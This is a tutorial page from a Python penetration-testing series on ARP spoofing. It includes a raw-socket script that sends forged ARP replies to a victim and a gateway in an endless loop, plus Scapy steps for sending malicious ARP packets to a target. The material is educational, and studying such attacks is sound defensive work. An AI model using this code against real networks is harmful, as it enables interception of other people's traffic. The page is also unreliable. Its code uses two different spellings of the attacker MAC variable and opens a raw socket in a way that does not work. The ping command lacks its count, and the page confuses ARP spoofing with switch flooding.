- Python Penetration Testing Tutorial
- Python Penetration Testing - Home
- Introduction
- Assessment Methodology
- Primer on Network Communication
- The Socket and its Methods
- Python Network Scanner
- Network Packet Sniffing
- ARP Spoofing
- Pentesting of Wireless Network
- Application Layer
- Client-side Validation
- DoS & DDoS attack
- SQLi Web Attack
- XSS Web Attack
- Useful Resources
- Quick Guide
- Useful Resources
- Discussion
Python Penetration Testing - ARP Spoofing
ARP may be defined as a stateless protocol which is used for mapping Internet Protocol (IP) addresses to a physical machine addresses.
Working of ARP
In this section, we will learn about the working of ARP. Consider the following steps to understand how ARP works −
Step 1 − First, when a machine wants to communicate with another it must look up to its ARP table for physical address.
Step 2 − If it finds the physical address of the machine, the packet after converting to its right length, will be sent to the desired machine
Step 3 − But if no entry is found for the IP address in the table, the ARP_request will be broadcast over the network.
Step 4 − Now, all the machines on the network will compare the broadcasted IP address to MAC address and if any of the machines in the network identifies the address, it will respond to the ARP_request along with its IP and MAC address. Such ARP message is called ARP_reply.
Step 5 − At last, the machine that sends the request will store the address pair in its ARP table and the whole communication will take place.
What is ARP Spoofing?
It may be defined as a type of attack where a malicious actor is sending a forged ARP request over the local area network. ARP Poisoning is also known as ARP Spoofing. It can be understood with the help of the following points −
First ARP spoofing, for overloading the switch, will constructs a huge number of falsified ARP request and reply packets.
Then the switch will be set in forwarding mode.
Now, the ARP table would be flooded with spoofed ARP responses, so that the attackers can sniff all network packets.
Implementation using Python
In this section, we will understand Python implementation of ARP spoofing. For this, we need three MAC addresses — first of the victim, second of the attacker and third of the gateway. Along with that, we also need to use the code of ARP protocol.
Let us import the required modules as follows −
import socket import struct import binascii
Now, we will create a socket, which will have three parameters. The first parameter tells us about the packet interface (PF_PACKET for Linux specific and AF_INET for windows), the second parameter tells us if it is a raw socket and the third parameter tells us about the protocol we are interested in (here 0x0800 used for IP protocol).
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))
s.bind(("eth0",socket.htons(0x0800)))
We will now provide the mac address of attacker, victim and gateway machine −
attckrmac = '\x00\x0c\x29\x4f\x8e\x76' victimmac ='\x00\x0C\x29\x2E\x84\x5A' gatewaymac = '\x00\x50\x56\xC0\x00\x28'
We need to give the code of ARP protocol as shown −
code ='\x08\x06'
Two Ethernet packets, one for victim machine and another for gateway machine have been crafted as follows −
ethernet1 = victimmac + attckmac + code ethernet2 = gatewaymac + attckmac + code
The following lines of code are in order as per accordance with the ARP header −
htype = '\x00\x01' protype = '\x08\x00' hsize = '\x06' psize = '\x04' opcode = '\x00\x02'
Now we need to give the IP addresses of the gateway machine and victim machines (Let us assume we have following IP addresses for gateway and victim machines) −
gateway_ip = '192.168.43.85' victim_ip = '192.168.43.131'
Convert the above IP addresses to hexadecimal format with the help of the socket.inet_aton() method.
gatewayip = socket.inet_aton ( gateway_ip ) victimip = socket.inet_aton ( victim_ip )
Execute the following line of code to change the IP address of gateway machine.
victim_ARP = ethernet1 + htype + protype + hsize + psize + opcode + attckmac + gatewayip + victimmac + victimip gateway_ARP = ethernet2 + htype + protype + hsize + psize +opcode + attckmac + victimip + gatewaymac + gatewayip while 1: s.send(victim_ARP) s.send(gateway_ARP)
Implementation using Scapy on Kali Linux
ARP spoofing can be implemented using Scapy on Kali Linux. Follow these steps to perform the same −
Step 1: Address of attacker machine
In this step, we will find the IP address of the attacker machine by running the command ifconfig on the command prompt of Kali Linux.
Step 2: Address of target machine
In this step, we will find the IP address of the target machine by running the command ifconfig on the command prompt of Kali Linux, which we need to open on another virtual machine.
Step 3: Ping the target machine
In this step, we need to ping the target machine from the attacker machine with the help of following command −
Ping –c 192.168.43.85(say IP address of target machine)
Step 4: ARP cache on target machine
We already know that two machines use ARP packets to exchange MAC addresses hence after step 3, we can run the following command on the target machine to see the ARP cache −
arp -n
Step 5: Creation of ARP packet using Scapy
We can create ARP packets with the help of Scapy as follows −
scapy arp_packt = ARP() arp_packt.display()
Step 6: Sending of malicious ARP packet using Scapy
We can send malicious ARP packets with the help of Scapy as follows −
arp_packt.pdst = “192.168.43.85”(say IP address of target machine) arp_packt.hwsrc = “11:11:11:11:11:11” arp_packt.psrc = ”1.1.1.1” arp_packt.hwdst = “ff:ff:ff:ff:ff:ff” send(arp_packt)
Step 7: Again check ARP cache on target machine
Now if we will again check ARP cache on target machine then we will see the fake address ‘1.1.1.1’.